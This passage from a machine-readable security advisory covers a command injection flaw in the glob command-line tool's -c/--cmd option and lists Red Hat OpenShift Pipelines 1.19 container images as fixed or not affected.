"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2415451"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in glob. This vulnerability allows arbitrary command execution via processing files with malicious names when the glob command-line interface (CLI) is used with the -c/--cmd option, enabling shell metacharacters to trigger command injection.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "glob: glob: Command Injection Vulnerability via Malicious Filenames",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in glob allows arbitrary command execution when the `glob` command-line interface is used with the `-c/--cmd` option to process files with malicious names. The vulnerability is triggered by shell metacharacters in filenames, leading to command injection. The glob CLI tool utilizes the -c option to execute shell commands over the files which matched the searched pattern by using the shell:true parameter when creating the subprocess which will further execute the command informed via \u0027-c\u0027 option, this parameter allows the shell meta characters to be used and processed when executing the command. Given that information glob misses to sanitize the file name to eliminate such characters and expressions from the filename, leading to code execution as when performing the shell expansion such characters will be interpreted as shell commands.\n\nTo exploit this vulnerability the targeted system should run the glob CLI over a file with a maliciously crafted filename, additionally the attacker needs to have enough permission to create such file or trick the user to download and process the required file with the glob CLI.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
